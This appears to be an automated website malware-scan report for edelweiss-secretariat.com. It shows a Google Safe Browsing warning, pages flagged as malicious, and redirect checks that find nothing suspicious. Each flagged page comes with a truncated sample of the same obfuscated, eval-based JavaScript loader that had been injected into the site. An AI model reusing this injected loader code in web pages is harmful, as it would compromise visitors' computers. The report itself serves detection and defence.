Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=edelweiss-secretariat.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://edelweiss-secretariat.com/ | 200 OK Content-Length: 14844 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://edelweiss-secretariat.com/backtothehtml.js | 200 OK Content-Length: 11642 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://edelweiss-secretariat.com/services.html | 200 OK Content-Length: 15259 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://edelweiss-secretariat.com/index.html | 200 OK Content-Length: 14844 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://edelweiss-secretariat.com/references.html | 200 OK Content-Length: 14140 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://edelweiss-secretariat.com/partenaires.html | 200 OK Content-Length: 14360 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://edelweiss-secretariat.com/contacts.html | 200 OK Content-Length: 14183 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) mtkmp="y";wndup="document";try{+function(){if(document.querySelector)--(window[wndup].getElementById("asd"))}()}catch(nozq){mmyzf=function(sjqdy){sjqdy="fro"+sjqdy;for(khdnus=0;khdnus<mtkmp.length;khdnus++){sgyb+=String[sjqdy](ktcw(csmv+(mtkmp[khdnus]))-(29));}};};ktcw=eval;csmv="0x";xpzuwx=0;if(!xpzuwx){try{++ktcw(wndup).body}catch(nozq){oismz="(";}mtkmp="3d(83(92(8b(80(91(86(8c(8b(3d(8e(88(4d(56(45(46(3d(98(2a(27(3d(93(7e(8f(3d(90(91(7e(91(86(80(5a(44(7e(87(7e(95(44(58(2a(27(3d(93(7e(8f(3d( Antivirus reports:
| ||
http://edelweiss-secretariat.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: edelweiss-secretariat.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 04:43:28 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 14844
Content-Type: text/html
Set-Cookie: 60gpBAK=R1224193598; path=/; expires=Sun, 11-Jan-2015 05:58:17 GMT
Set-Cookie: 60gp=R477163721; path=/; expires=Sun, 11-Jan-2015 05:49:36 GMT
...14844 bytes of data.
GET / HTTP/1.1
Host: edelweiss-secretariat.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 04:43:28 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 14844
Content-Type: text/html
Set-Cookie: 60gpBAK=R1224193598; path=/; expires=Sun, 11-Jan-2015 05:58:17 GMT
Set-Cookie: 60gp=R477163721; path=/; expires=Sun, 11-Jan-2015 05:49:36 GMT
...14844 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: edelweiss-secretariat.com
Referer: http://www.google.com/search?q=edelweiss-secretariat.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: edelweiss-secretariat.com
Referer: http://www.google.com/search?q=edelweiss-secretariat.com
Result:
The result is similar to the first query. There are no suspicious redirects found.